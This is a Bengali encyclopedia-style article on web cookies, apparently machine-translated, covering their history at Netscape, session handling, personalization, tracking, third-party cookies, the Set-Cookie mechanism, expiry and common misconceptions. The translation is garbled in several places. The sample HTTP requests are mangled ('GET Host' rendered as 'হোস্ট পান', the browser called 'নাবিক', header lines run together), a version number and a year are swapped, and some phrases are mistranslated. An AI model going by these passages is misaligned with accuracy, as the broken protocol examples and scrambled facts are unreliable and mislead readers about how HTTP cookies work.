সম্পাদক পর্যালোচনা
Un কুকি বা ওয়েব কুকি (অথবা কুকি, সংক্ষেপে হিসাবে সাক্ষী কুইবেকে) HTTP কমিউনিকেশন প্রোটোকল দ্বারা সংজ্ঞায়িত করা হয় একটি HTTP সার্ভার দ্বারা একটি HTTP ক্লায়েন্টকে পাঠানো তথ্যের একটি ক্রম হিসাবে, যেটি নির্দিষ্ট শর্তের অধীনে একই HTTP সার্ভারকে জিজ্ঞাসা করার সময় পরবর্তীটি ফেরত দেয়।
কুকি একটি এর সমতুল্য টার্মিনালে সংরক্ষিত ছোট টেক্সট ফাইল ইন্টারনেট ব্যবহারকারীর। 20 বছরেরও বেশি সময় ধরে বিদ্যমান, তারা ওয়েবসাইট ডেভেলপারদের তাদের নেভিগেশনের সুবিধার্থে ব্যবহারকারীর ডেটা সংরক্ষণ করার অনুমতি দেয় এবং নির্দিষ্ট কার্যকারিতার অনুমতি দেয়। কুকিজ সবসময় কমবেশি বিতর্কিত হয়েছে কারণ এতে অবশিষ্ট ব্যক্তিগত তথ্য থাকে যা তৃতীয় পক্ষের দ্বারা সম্ভাব্যভাবে শোষণ করা যেতে পারে।
এটি একটি HTTP শিরোনাম হিসাবে ওয়েব সার্ভার দ্বারা ওয়েব ব্রাউজারে পাঠানো হয় যা প্রতিটিবার সার্ভারে অ্যাক্সেস করার সময় এটি অপরিবর্তিত ফেরত দেয়। একটি কুকি ব্যবহার করা যেতে পারে একটি প্রমাণীকরণ, একটি অধিবেশন (রাষ্ট্রীয় রক্ষণাবেক্ষণ), এবং জন্য ব্যবহারকারী সম্পর্কে নির্দিষ্ট তথ্য সংরক্ষণ করুন, যেমন সাইট পছন্দ বা একটি ইলেকট্রনিক শপিং কার্টের বিষয়বস্তু। কুকি শব্দটি থেকে এসেছে ম্যাজিক কুকি, UNIX কম্পিউটিং-এর একটি সুপরিচিত ধারণা, যা ব্রাউজার কুকিজের ধারণা এবং নামকে অনুপ্রাণিত করেছে। কুকিজের কয়েকটি বিকল্প বিদ্যমান, প্রতিটির নিজস্ব ব্যবহার, সুবিধা এবং অসুবিধা রয়েছে।
সহজ পাঠ্য ফাইল হচ্ছে, কুকিজ এক্সিকিউটেবল নয়। তারা না স্পাইওয়্যার বা ভাইরাস নয়, যদিও কিছু সাইট থেকে কুকিগুলি অনেক অ্যান্টি-ভাইরাস সফ্টওয়্যার দ্বারা সনাক্ত করা হয় কারণ তারা ব্যবহারকারীদের একাধিক সাইট দেখার সময় ট্র্যাক করার অনুমতি দেয়৷
বেশিরভাগ আধুনিক ব্রাউজার ব্যবহারকারীদের অনুমতি দেয় কুকি গ্রহণ বা প্রত্যাখ্যান করার সিদ্ধান্ত নিন. ব্যবহারকারীরাও পারেন কুকি কতক্ষণ সংরক্ষণ করা হয় তা চয়ন করুন. যাইহোক, কুকিজ সম্পূর্ণ প্রত্যাখ্যান কিছু সাইট অব্যবহারযোগ্য করে তোলে। উদাহরণস্বরূপ, শপিং কার্ট বা সাইটগুলি সঞ্চয় করুন যাতে শংসাপত্র (ব্যবহারকারীর নাম এবং পাসওয়ার্ড) ব্যবহার করে লগইন করতে হয়।
বিষয়বস্তু টেবিল
ইতিহাস
শব্দটি মিষ্ট রূটি ইংরেজি শব্দ থেকে উদ্ভূত ম্যাজিক কুকি, যা ডেটার একটি প্যাকেট যা একটি প্রোগ্রাম গ্রহণ করে এবং অপরিবর্তিত ফেরত দেয়। কুকিজ আগে থেকেই আইটি ব্যবহার করা হয়েছিল যখন লু মন্টুলি ওয়েব যোগাযোগে তাদের ব্যবহার করার ধারণা ছিল জুন 1994 মধ্যে। সেই সময়ে, তিনি নেটস্কেপ কমিউনিকেশনস দ্বারা নিযুক্ত ছিলেন, যেটি একটি ক্লায়েন্টের জন্য একটি ই-কমার্স অ্যাপ্লিকেশন তৈরি করেছিল। কুকিজ একটি দোকানের ভার্চুয়াল শপিং কার্ট বাস্তবায়নের নির্ভরযোগ্যতার সমস্যার সমাধান দিয়েছে।
জন জিয়ানান্দ্রিয়া এবং লু মন্টুলি একই বছর নেটস্কেপের প্রথম কুকি স্পেসিফিকেশন লিখেছিলেন। মোজাইক নেটস্কেপের 0.9 বিটা সংস্করণ, 13 অক্টোবর, 1994-এ প্রকাশিত, সমন্বিত কুকি প্রযুক্তি (পোস্ট দেখুন) কুকিজের প্রথম (অ-পরীক্ষামূলক) ব্যবহার ছিল নেটস্কেপ ওয়েবসাইটের দর্শকরা আগে সাইটটি পরিদর্শন করেছে কিনা তা নির্ধারণ করা। মন্টুলি 1995 সালে কুকি প্রযুক্তির জন্য একটি পেটেন্ট আবেদন দাখিল করেন এবং US পেটেন্ট 5774670 মঞ্জুর করা হয়। 1998 সালে দেওয়া হয়েছিল.
0.9 সালে নেটস্কেপ 1994 বিটাতে বাস্তবায়িত হওয়ার পর, কুকিজ ইন্টারনেট এক্সপ্লোরার 2-এ একীভূত করা হয়েছিল, যা 1995 সালের অক্টোবরে প্রকাশিত হয়েছিল।
কুকির প্রচলন এখনও জনসাধারণের কাছে ব্যাপকভাবে পরিচিত হয়নি। বিশেষ করে, ব্রাউজার সেটিংসে ডিফল্টরূপে কুকিজ গ্রহণ করা হয়েছিল এবং ব্যবহারকারীদের তাদের উপস্থিতির বিষয়ে জানানো হয়নি। কিছু লোক 1995 সালের প্রথম ত্রৈমাসিকের কাছাকাছি কুকির অস্তিত্ব সম্পর্কে সচেতন ছিল, কিন্তু 12 ফেব্রুয়ারী, 1996-এ ফাইন্যান্সিয়াল টাইমস একটি নিবন্ধ প্রকাশ করার পরেই সাধারণ জনগণ তাদের অস্তিত্ব নিয়েছিল। একই বছরে, কুকিজ মিডিয়ার প্রচুর মনোযোগ পেয়েছিল। সম্ভাব্য গোপনীয়তার অনুপ্রবেশের কারণে। 1996 এবং 1997 সালে আমেরিকান ফেডারেল ট্রেড কমিশনের দুটি পরামর্শে কুকিজের বিষয়টি আলোচনা করা হয়েছিল।
অফিসিয়াল কুকি স্পেসিফিকেশনের উন্নয়ন ইতিমধ্যেই চলছে। অফিসিয়াল স্পেসিফিকেশনের প্রথম আলোচনা 1995 সালের এপ্রিলে www-talk মেলিং লিস্টে হয়েছিল। একটি বিশেষ আইইটিএফ ওয়ার্কিং গ্রুপ গঠিত হয়েছিল। এইচটিটিপি লেনদেনে রাষ্ট্র প্রবর্তনের জন্য দুটি বিকল্প প্রস্তাব যথাক্রমে ব্রায়ান বেহেলেনডর্ফ এবং ডেভিড ক্রিস্টল দ্বারা প্রস্তাব করা হয়েছিল, কিন্তু ক্রিস্টলের স্বয়ং নেতৃত্বাধীন গ্রুপটি নেটস্কেপের স্পেসিফিকেশনকে একটি সূচনা পয়েন্ট হিসাবে ব্যবহার করার সিদ্ধান্ত নিয়েছে। ফেব্রুয়ারী 1996 সালে, ওয়ার্কিং গ্রুপ নির্ধারণ করে যে তৃতীয় পক্ষের কুকিগুলি গোপনীয়তার জন্য একটি উল্লেখযোগ্য হুমকি। গ্রুপ দ্বারা উত্পাদিত স্পেসিফিকেশন অবশেষে হিসাবে প্রকাশিত হয় RFC 2109.
2014 এর শেষ থেকে, আমরা অনেক সাইটে কুকি সম্পর্কে একটি ব্যানার দেখতে পাই। অন্তত একটি ব্রাউজার এক্সটেনশন আছে যা অনুমতি দেয় ব্যানার প্রদর্শিত হয় না.
কুকিজ এবং ব্যবহারের প্রকার
সেশন পরিচালনা
কুকিগুলি নেভিগেশনের সময় ব্যবহারকারীর ডেটা বজায় রাখতে ব্যবহার করা যেতে পারে, তবে একাধিক ভিজিট জুড়েও। কুকিগুলি ইলেকট্রনিক শপিং কার্ট বাস্তবায়নের একটি উপায় প্রদানের জন্য চালু করা হয়েছিল, একটি ভার্চুয়াল ডিভাইস যেখানে ব্যবহারকারী সাইটটি ব্রাউজ করার সময় যে আইটেমগুলি কিনতে চান তা জমা করতে পারে৷
আজকাল, শপিং কার্টের মতো অ্যাপগুলি সার্ভারে একটি ডাটাবেসে আইটেমগুলির তালিকা সংরক্ষণ করে, যা পছন্দনীয়; কুকিতে সেভ করার চেয়ে। ওয়েব সার্ভার একটি অনন্য সেশন আইডি ধারণকারী একটি কুকি পাঠায়। ওয়েব ব্রাউজার তারপর প্রতিটি পরবর্তী অনুরোধে এই সেশন আইডি ফেরত দেয় এবং ঝুড়ির আইটেমগুলি সংরক্ষণ করা হয় এবং একই অনন্য সেশন আইডির সাথে যুক্ত করা হয়।
ক্রেডেনশিয়াল ব্যবহার করে একটি সাইটে লগ ইন করার জন্য কুকিজের ঘন ঘন ব্যবহার উপযোগী। সংক্ষেপে, ওয়েব সার্ভার প্রথমে একটি অনন্য সেশন আইডি ধারণকারী একটি কুকি পাঠায়। তারপর ব্যবহারকারীরা তাদের শংসাপত্র (সাধারণত একটি ব্যবহারকারীর নাম এবং পাসওয়ার্ড) প্রদান করে। ওয়েব অ্যাপ্লিকেশন তারপর সেশনটি প্রমাণীকরণ করে এবং ব্যবহারকারীকে পরিষেবাটি অ্যাক্সেস করার অনুমতি দেয়।
ব্যক্তিগতকরণ
কুকি একটি সাইটের ব্যবহারকারী সম্পর্কে তথ্য মনে রাখতে ব্যবহার করা যেতে পারে, যাতে ভবিষ্যতে তাকে উপযুক্ত সামগ্রী দেখাতে পারে। উদাহরণস্বরূপ, একটি ওয়েব সার্ভার সেই ওয়েবসাইটে লগ ইন করার জন্য ব্যবহৃত শেষ ব্যবহারকারীর নাম সহ একটি কুকি পাঠাতে পারে, যাতে ব্যবহারকারীর নাম ভবিষ্যতের ভিজিটগুলিতে প্রাক-পপুলেট করা যায়।
অনেক ওয়েবসাইট ব্যবহারকারীর পছন্দের উপর ভিত্তি করে ব্যক্তিগতকরণের জন্য কুকিজ ব্যবহার করে। ব্যবহারকারীরা একটি ফর্মে তাদের পছন্দগুলি নির্বাচন করে এবং সার্ভারে জমা দেয়। সার্ভার একটি কুকিতে পছন্দগুলি এনকোড করে এবং ব্রাউজারে ফেরত পাঠায়। পরবর্তীকালে, ব্যবহারকারী যখনই এই সাইটের একটি পৃষ্ঠা অ্যাক্সেস করে, ব্রাউজার কুকি ফেরত দেয় এবং তাই পছন্দের তালিকা; সার্ভার তারপর ব্যবহারকারীর পছন্দ অনুযায়ী পৃষ্ঠাটি কাস্টমাইজ করতে পারে। উদাহরণস্বরূপ, উইকিপিডিয়া ওয়েবসাইট তার ব্যবহারকারীদের তাদের পছন্দের সাইটের ত্বক বেছে নিতে দেয়। Google সার্চ ইঞ্জিন তার ব্যবহারকারীদের (এমনকি তারা নিবন্ধিত না থাকলেও) প্রতিটি ফলাফলের পৃষ্ঠায় তারা কতগুলো ফলাফল দেখতে চায় তা বেছে নিতে দেয়।
ট্র্যাকিং
ইন্টারনেট ব্যবহারকারীদের ব্রাউজিং অভ্যাস ট্র্যাক করতে ট্র্যাকিং কুকিজ ব্যবহার করা হয়। এটি আংশিকভাবে কম্পিউটারের আইপি ঠিকানা ব্যবহার করে একটি পৃষ্ঠার জন্য অনুরোধ করে বা 'রেফারার' HTTP শিরোনাম ব্যবহার করেও করা যেতে পারে যা ক্লায়েন্ট প্রতিটি অনুরোধের সাথে পাঠায়, কিন্তু কুকিজ আরও নির্ভুলতার জন্য অনুমতি দেয়। এটি নিম্নলিখিত উদাহরণ হিসাবে করা যেতে পারে:
- যদি ব্যবহারকারী একটি সাইটে একটি পৃষ্ঠা কল করে, এবং অনুরোধে একটি কুকি না থাকে, সার্ভার অনুমান করে যে এটি ব্যবহারকারীর দ্বারা পরিদর্শন করা প্রথম পৃষ্ঠা। সার্ভার তারপর একটি র্যান্ডম স্ট্রিং তৈরি করে এবং অনুরোধ করা পৃষ্ঠার সাথে ব্রাউজারে পাঠায়।
- এই মুহূর্ত থেকে, প্রতিবার সাইটের একটি নতুন পৃষ্ঠা কল করার সময় ব্রাউজার দ্বারা কুকি স্বয়ংক্রিয়ভাবে পাঠানো হবে। সার্ভার যথারীতি পৃষ্ঠাটি পাঠাবে, কিন্তু একটি লগ ফাইলে বলা পৃষ্ঠার URL, তারিখ, অনুরোধের সময় এবং কুকিও লগ করবে৷
লগ ফাইলটি দেখে, ব্যবহারকারী কোন পৃষ্ঠাগুলি পরিদর্শন করেছে এবং কোন ক্রমে তা দেখা সম্ভব। উদাহরণস্বরূপ, যদি ফাইলটিতে id=abc কুকি ব্যবহার করে করা কয়েকটি অনুরোধ থাকে, তাহলে এটি প্রতিষ্ঠিত হতে পারে যে এই সমস্ত অনুরোধ একই ব্যবহারকারীর কাছ থেকে এসেছে। অনুরোধ করা URL, অনুরোধের সাথে যুক্ত তারিখ এবং সময় ব্যবহারকারীর ব্রাউজিং ট্র্যাক করার অনুমতি দেয়।
তৃতীয় পক্ষের কুকিজ এবং ওয়েব বীকন, নীচে ব্যাখ্যা করা হয়েছে, অতিরিক্তভাবে বিভিন্ন সাইট জুড়ে ট্র্যাকিং সক্ষম করে৷ একক সাইট ট্র্যাকিং সাধারণত পরিসংখ্যানগত উদ্দেশ্যে ব্যবহৃত হয়। বিপরীতে, তৃতীয় পক্ষের কুকিজ ব্যবহার করে বিভিন্ন সাইট জুড়ে ট্র্যাকিং সাধারণত বিজ্ঞাপন সংস্থাগুলি বেনামী ব্যবহারকারীর প্রোফাইল তৈরি করতে ব্যবহার করে (যা তারপর ব্যবহারকারীকে কোন বিজ্ঞাপনগুলি দেখানো উচিত এবং সেইসাথে তাকে এই বিজ্ঞাপনগুলির সাথে সম্পর্কিত ইমেলগুলি পাঠানোর জন্য ব্যবহৃত হয় — স্প্যাম )
ট্র্যাকিং কুকিজ ব্যবহারকারীর গোপনীয়তা আক্রমণের ঝুঁকি কিন্তু সেগুলি সহজেই মুছে ফেলা যায়। বেশিরভাগ আধুনিক ব্রাউজারে অ্যাপ্লিকেশনটি বন্ধ করার সময় স্বয়ংক্রিয়ভাবে স্থায়ী কুকিজ মুছে ফেলার একটি বিকল্প রয়েছে।
তৃতীয় পক্ষের কুকিজ
একটি ওয়েব পৃষ্ঠায় থাকা ছবি এবং অন্যান্য বস্তু পৃষ্ঠা হোস্ট করা সার্ভার থেকে ভিন্ন হতে পারে। পৃষ্ঠাটি প্রদর্শন করতে, ব্রাউজার এই সমস্ত বস্তু ডাউনলোড করে। বেশিরভাগ ওয়েবসাইটে বিভিন্ন উৎস থেকে তথ্য থাকে। উদাহরণস্বরূপ, আপনি যদি আপনার ব্রাউজারে www.example.com টাইপ করেন, তাহলে প্রায়ই পৃষ্ঠার অংশে এমন বস্তু বা বিজ্ঞাপন থাকবে যা বিভিন্ন উত্স থেকে আসে, যেমন www. .example.com থেকে ভিন্ন ডোমেন থেকে। "প্রথম" পক্ষের কুকিগুলি হল কুকি যা ব্রাউজারের ঠিকানা বারে তালিকাভুক্ত ডোমেন দ্বারা সেট করা হয়৷ থার্ড-পার্টি কুকি একটি ভিন্ন ডোমেন থেকে আসা পৃষ্ঠা অবজেক্টগুলির একটি দ্বারা সেট করা হয়।
ডিফল্টরূপে, মজিলা ফায়ারফক্স, মাইক্রোসফ্ট ইন্টারনেট এক্সপ্লোরার এবং অপেরার মতো ব্রাউজারগুলি তৃতীয় পক্ষের কুকিগুলি গ্রহণ করে, তবে ব্যবহারকারীরা তাদের ব্লক করতে ব্রাউজার বিকল্পগুলিতে সেটিংস পরিবর্তন করতে পারে। ওয়েব কার্যকারিতা সক্ষম করে এমন তৃতীয় পক্ষের কুকিগুলিতে অন্তর্নিহিত কোনও নিরাপত্তা ঝুঁকি নেই, তবে সেগুলি ব্যবহারকারীদের ট্র্যাক করতেও ব্যবহৃত হয়। সাইট থেকে সাইট.
Google Chrome সহ সমস্ত ব্রাউজারগুলির জন্য উপলব্ধ Ghostery-এর মতো সরঞ্জামগুলি তৃতীয় পক্ষের মধ্যে বিনিময়গুলিকে ব্লক করতে পারে৷
বাস্তবায়ন
কুকিজ হল ওয়েব সার্ভার দ্বারা ব্রাউজারে পাঠানো ডেটার ছোট টুকরো। ব্রাউজার তাদের সার্ভারে অপরিবর্তিত ফিরিয়ে দেয়, অন্যথায় স্টেটলেস HTTP লেনদেনের মধ্যে রাষ্ট্র (অতীতের ঘটনাগুলির স্মৃতি) প্রবর্তন করে। কুকিজ ব্যতীত, একটি ওয়েব পৃষ্ঠার প্রতিটি পুনরুদ্ধার বা একটি ওয়েব পৃষ্ঠার একটি উপাদান একটি বিচ্ছিন্ন ঘটনা, একই সাইটে করা অন্যান্য অনুরোধ থেকে স্বাধীন। ওয়েব সার্ভার দ্বারা সেট করতে সক্ষম হওয়ার পাশাপাশি, ব্রাউজার দ্বারা সমর্থিত এবং অনুমোদিত হলে, জাভাস্ক্রিপ্টের মতো স্ক্রিপ্টিং ভাষা দ্বারাও কুকিগুলি সেট করা যেতে পারে।
অফিসিয়াল কুকি স্পেসিফিকেশন পরামর্শ দেয় যে ব্রাউজারগুলি ন্যূনতম সংখ্যক কুকি সংরক্ষণ এবং পুনরায় পাঠাতে সক্ষম হওয়া উচিত। বিশেষ করে, একটি ব্রাউজারকে চার কিলোবাইটের কমপক্ষে 300টি কুকি এবং একটি সার্ভার বা ডোমেনের জন্য কমপক্ষে 20টি কুকি সংরক্ষণ করতে সক্ষম হওয়া উচিত৷
এর ধারা 3.1 অনুযায়ী RFC 2965, কুকির নামগুলি অক্ষর-সংবেদনশীল।
একটি কুকি তার মেয়াদ শেষ হওয়ার তারিখ নির্দিষ্ট করতে পারে, এই ক্ষেত্রে কুকিটি এই তারিখে মুছে ফেলা হবে। যদি কুকি একটি মেয়াদ শেষ হওয়ার তারিখ উল্লেখ না করে, ব্যবহারকারী তার ব্রাউজার ছেড়ে যাওয়ার সাথে সাথে কুকিটি মুছে ফেলা হয়। অতএব, মেয়াদ শেষ হওয়ার তারিখ উল্লেখ করা কুকিকে একাধিক সেশনের মাধ্যমে টিকে থাকার একটি উপায়। এই কারণে, একটি মেয়াদ শেষ হওয়ার তারিখ সহ কুকি বলা হয় অধ্যবসায়ী. একটি উদাহরণ অ্যাপ্লিকেশন: ব্যবহারকারীরা তাদের শপিং কার্টে রাখা আইটেমগুলি রেকর্ড করতে একটি খুচরা সাইট ক্রমাগত কুকি ব্যবহার করতে পারে (বাস্তবে, কুকিটি বিক্রয়ের সাইটে একটি ডাটাবেসে সংরক্ষিত একটি এন্ট্রিকে উল্লেখ করতে পারে, আপনার কম্পিউটারে নয়) . এর মাধ্যমে, ব্যবহারকারীরা যদি ক্রয় না করে তাদের ব্রাউজার ছেড়ে যান এবং পরে এটিতে ফিরে যান, তারা আবার কার্টে আইটেমগুলি খুঁজে পেতে সক্ষম হবেন। যদি এই কুকিগুলি মেয়াদ শেষ হওয়ার তারিখ না দেয় তবে ব্রাউজারটি বন্ধ হয়ে গেলে সেগুলি মেয়াদ শেষ হয়ে যাবে এবং ঝুড়ির বিষয়বস্তুর তথ্য হারিয়ে যাবে৷
কুকিজ একটি নির্দিষ্ট ডোমেন, সাবডোমেন বা সার্ভারের পাথের মধ্যে সীমাবদ্ধ হতে পারে যা তাদের তৈরি করেছে।
একটি কুকি তৈরি
হাইপারটেক্সট ট্রান্সফার প্রোটোকল (HTTP) ব্যবহার করে ওয়েব পেজ স্থানান্তর করা হয়। কুকিজ উপেক্ষা করে, ব্রাউজারগুলি ওয়েব সার্ভার থেকে একটি পৃষ্ঠাকে কল করে সাধারণত তাদের একটি ছোট পাঠ্য পাঠায় HTTP অনুরোধ. উদাহরণস্বরূপ, www.example.org/index.html পৃষ্ঠাটি অ্যাক্সেস করতে, ব্রাউজারগুলি www.example.org সার্ভারের সাথে সংযোগ করে এবং একটি অনুরোধ পাঠায় যা এইরকম দেখায়:
| /index.html HTTP/1.1 হোস্ট পান: www.example.org | ||
| নাবিক | → | সার্ভার |
সার্ভার অনুরোধ করা পৃষ্ঠাটি পাঠিয়ে সাড়া দেয়, তার আগে একটি অনুরূপ পাঠ্য, পুরোটিকে বলা হচ্ছে HTTP প্রতিক্রিয়া. এই প্যাকেটটিতে ব্রাউজারকে কুকি সংরক্ষণ করার জন্য নির্দেশনা দেওয়া লাইন থাকতে পারে:
| HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML পৃষ্ঠা) | ||
| নাবিক | ← | সার্ভার |
সার্ভার শুধুমাত্র সেট-কুকি লাইন পাঠায়, যদি সার্ভার ব্রাউজারটি একটি কুকি সংরক্ষণ করতে চায়। Set-Cookie হল ব্রাউজারকে name=value স্ট্রিং সংরক্ষণ করার জন্য একটি অনুরোধ এবং সার্ভারে ভবিষ্যতের সমস্ত অনুরোধে এটি ফেরত দিতে। যদি ব্রাউজারটি কুকিজ সমর্থন করে এবং ব্রাউজার বিকল্পগুলিতে কুকিজ সক্ষম করা হয়, তাহলে একই সার্ভারে করা পরবর্তী সমস্ত অনুরোধগুলিতে কুকি অন্তর্ভুক্ত করা হবে৷ উদাহরণস্বরূপ, ব্রাউজার www.example.org/news.html সার্ভারে নিম্নলিখিত অনুরোধটি পাঠিয়ে www.example.org/news.html পৃষ্ঠাটিকে কল করে:
| /news.html HTTP/1.1 হোস্ট পান: www.example.orgCookie: name=valueAccept: */* | ||
| নাবিক | → | সার্ভার |
এটি একই সার্ভার থেকে অন্য পৃষ্ঠার জন্য একটি অনুরোধ, এবং উপরের প্রথমটির থেকে আলাদা কারণ এতে একটি স্ট্রিং রয়েছে যা সার্ভারটি আগে ব্রাউজারে পাঠিয়েছিল৷ এর জন্য ধন্যবাদ, সার্ভার জানে যে এই অনুরোধটি আগেরটির সাথে লিঙ্ক করা হয়েছে। সার্ভার কল করা পৃষ্ঠাটি পাঠিয়ে এবং এতে অন্যান্য কুকি যোগ করে প্রতিক্রিয়া জানায়।
কুকির মান একটি নতুন লাইন Set-Cookie পাঠিয়ে সার্ভার দ্বারা পরিবর্তন করা যেতে পারে: name=new_value বলা পৃষ্ঠার প্রতিক্রিয়ায়। ব্রাউজার তারপরে পুরানো মানটিকে নতুন দিয়ে প্রতিস্থাপন করে।
সেট-কুকি লাইন সাধারণত একটি CGI প্রোগ্রাম বা অন্যান্য স্ক্রিপ্টিং ভাষা দ্বারা তৈরি করা হয়, HTTP সার্ভার দ্বারা নয়। HTTP সার্ভার (উদাহরণ: Apache) শুধুমাত্র ব্রাউজারে প্রোগ্রামের ফলাফল (কুকিজ সম্বলিত হেডারের পূর্বে একটি নথি) প্রেরণ করবে।
কুকিগুলি জাভাস্ক্রিপ্ট বা ব্রাউজারে চলমান অন্যান্য অনুরূপ ভাষা দ্বারাও সেট করা যেতে পারে, যেমন সার্ভারের পরিবর্তে ক্লায়েন্ট সাইডে। JavaScript এ, document.cookie অবজেক্টটি এই উদ্দেশ্যে ব্যবহার করা হয়। উদাহরণস্বরূপ, বিবৃতি document.cookie = "temperature=20" "temperature" নামে একটি কুকি তৈরি করে এবং এর মান 20।
কুকির বৈশিষ্ট্য
নাম/মান পেয়ার ছাড়াও, একটি কুকিতে একটি মেয়াদ শেষ হওয়ার তারিখ, একটি পথ, একটি ডোমেন নাম এবং অভিপ্রেত সংযোগের ধরনও থাকতে পারে, যেমন স্বাভাবিক বা এনক্রিপ্ট করা। RFC 2965 এছাড়াও সংজ্ঞায়িত করে যে কুকিগুলির একটি বাধ্যতামূলক সংস্করণ নম্বর থাকতে হবে, তবে এটি সাধারণত বাদ দেওয়া হয়। এই ডেটা অংশগুলি name=new_value জোড়া অনুসরণ করে এবং সেমিকোলন দ্বারা পৃথক করা হয়। উদাহরণস্বরূপ, একটি সেট-কুকি লাইন পাঠিয়ে সার্ভার দ্বারা একটি কুকি তৈরি করা যেতে পারে: name=new_value; মেয়াদ শেষ = তারিখ; পথ=/; domain=.example.org.
একটি কুকির মেয়াদ শেষ
কুকিজের মেয়াদ শেষ হয়ে যায় এবং তারপরে ব্রাউজার দ্বারা নিম্নলিখিত পরিস্থিতিতে সার্ভারে পাঠানো হয় না:
- ব্রাউজারটি বন্ধ হয়ে গেলে, কুকি স্থায়ী না হলে।
- যখন কুকির মেয়াদ শেষ হয়ে গেছে।
- যখন কুকির মেয়াদ শেষ হওয়ার তারিখ (সার্ভার বা স্ক্রিপ্ট দ্বারা) অতীতের একটি তারিখে পরিবর্তিত হয়।
- যখন ব্রাউজার ব্যবহারকারীর অনুরোধে কুকি মুছে দেয়।
তৃতীয় পরিস্থিতি সার্ভার বা স্ক্রিপ্টগুলিকে স্পষ্টভাবে একটি কুকি মুছে ফেলার অনুমতি দেয়। নোট করুন যে Google Chrome ওয়েব ব্রাউজারের মাধ্যমে বিষয়বস্তু সেটিংস অ্যাক্সেস করে একটি নির্দিষ্ট কুকির মেয়াদ শেষ হওয়ার তারিখ জানা সম্ভব। একটি কম্পিউটারে সংরক্ষিত একটি কুকি বেশ কয়েক দশক ধরে সেখানে থেকে যেতে পারে যদি এটি মুছে ফেলার জন্য কোনো পদ্ধতি গ্রহণ না করা হয়।
ভ্রান্ত ধারনা
ইন্টারনেটে তাদের পরিচয়ের পর থেকে, কুকিজ সম্পর্কে অনেক ধারণা ইন্টারনেটে এবং মিডিয়াতে প্রচারিত হয়েছে। 1998 সালে, ইউনাইটেড স্টেটস ডিপার্টমেন্ট অফ এনার্জি কম্পিউটার ইভেন্ট মনিটরিং টিম, সিআইএসি নির্ধারণ করেছিল যে কুকি নিরাপত্তা দুর্বলতাগুলি "আবশ্যিকভাবে অস্তিত্বহীন" ছিল এবং ব্যাখ্যা করেছিল যে "আপনার পরিদর্শনের উত্স এবং আপনি যে ওয়েব পৃষ্ঠাগুলি পরিদর্শন করেছেন তার বিশদ বিবরণ ওয়েব সার্ভারের লগ ফাইলে ইতিমধ্যেই বিদ্যমান”। 2005 সালে, জুপিটার রিসার্চ একটি গবেষণার ফলাফল প্রকাশ করেছে, যেখানে উত্তরদাতাদের একটি উল্লেখযোগ্য শতাংশ নিম্নলিখিত বিবৃতিগুলি বিবেচনা করেছে:
- কুকিজ মত দুষ্ট, তারা ব্যবহারকারীদের হার্ড ড্রাইভ সংক্রামিত.
- কুকিজ তৈরি করে পপ-আপ.
- কুকি পাঠাতে ব্যবহার করা হয় স্প্যাম.
- কুকিজ শুধুমাত্র বিজ্ঞাপনের জন্য ব্যবহার করা হয়.
কুকিজ ব্যবহারকারীর কম্পিউটার থেকে তথ্য মুছে ফেলতে বা পড়তে পারে না। যাইহোক, কুকিজ একটি প্রদত্ত সাইট বা সাইটের সেটে ব্যবহারকারীর দ্বারা পরিদর্শন করা ওয়েব পৃষ্ঠাগুলি সনাক্ত করা সম্ভব করে। এই তথ্যটি একটি ব্যবহারকারীর প্রোফাইলে সংগ্রহ করা যেতে পারে যা তৃতীয় পক্ষের কাছে ব্যবহার বা পুনরায় বিক্রি করা যেতে পারে, যা গুরুতর গোপনীয়তার সমস্যা তৈরি করতে পারে। কিছু প্রোফাইল বেনামী, এই অর্থে যে সেগুলিতে কোনও ব্যক্তিগত তথ্য নেই, তবুও এই জাতীয় প্রোফাইলগুলি সন্দেহজনক হতে পারে।
একই সমীক্ষা অনুসারে, ইন্টারনেট ব্যবহারকারীদের একটি বড় শতাংশ জানেন না কীভাবে কুকি মুছতে হয়। লোকেরা কুকিজকে বিশ্বাস না করার একটি কারণ হল যে কিছু সাইট কুকিজের ব্যক্তিগতভাবে সনাক্তকারী দিকটির অপব্যবহার করেছে এবং এই তথ্যটি অন্যান্য উত্সের সাথে ভাগ করেছে৷ লক্ষ্যযুক্ত বিজ্ঞাপন এবং অযাচিত ইমেলের একটি বড় শতাংশ, যা স্প্যাম হিসাবে বিবেচিত হয়, ট্র্যাকিং কুকিজ থেকে সংগ্রহ করা তথ্য থেকে আসে।
ব্রাউজার সেটিংস
বেশিরভাগ ব্রাউজার কুকি সমর্থন করে এবং ব্যবহারকারীকে সেগুলি অক্ষম করার অনুমতি দেয়। সবচেয়ে সাধারণ বিকল্প হল:
- কুকিজ সম্পূর্ণরূপে সক্রিয় বা নিষ্ক্রিয় করুন, যাতে সেগুলি ক্রমাগত গৃহীত বা অবরুদ্ধ থাকে।
- ব্রাউজারের ঠিকানা বারে javascript: alert(document.cookie) প্রবেশ করে ব্যবহারকারীকে একটি প্রদত্ত পৃষ্ঠায় সক্রিয় কুকি দেখতে অনুমতি দিন। কিছু ব্রাউজার ব্যবহারকারীর জন্য একটি কুকি ম্যানেজার অন্তর্ভুক্ত করে যারা বর্তমানে ব্রাউজার দ্বারা সংরক্ষিত কুকি দেখতে এবং মুছে ফেলতে পারে।
বেশিরভাগ ব্রাউজার ব্যক্তিগত ডেটা সম্পূর্ণ মুছে ফেলার অনুমতি দেয় যার মধ্যে কুকিজ রয়েছে। কুকি অনুমতি নিয়ন্ত্রণ করার জন্য অতিরিক্ত মডিউলও বিদ্যমান।
গোপনীয়তা এবং তৃতীয় পক্ষের কুকিজ
এই কাল্পনিক উদাহরণে, একটি বিজ্ঞাপন সংস্থা দুটি ওয়েবসাইটে ব্যানার স্থাপন করেছে। তার সার্ভারে ব্যানার হোস্ট করে এবং তৃতীয় পক্ষের কুকিজ ব্যবহার করে, বিজ্ঞাপন কোম্পানি এই দুটি সাইটের মাধ্যমে ব্যবহারকারীর নেভিগেশন ট্র্যাক করতে সক্ষম।
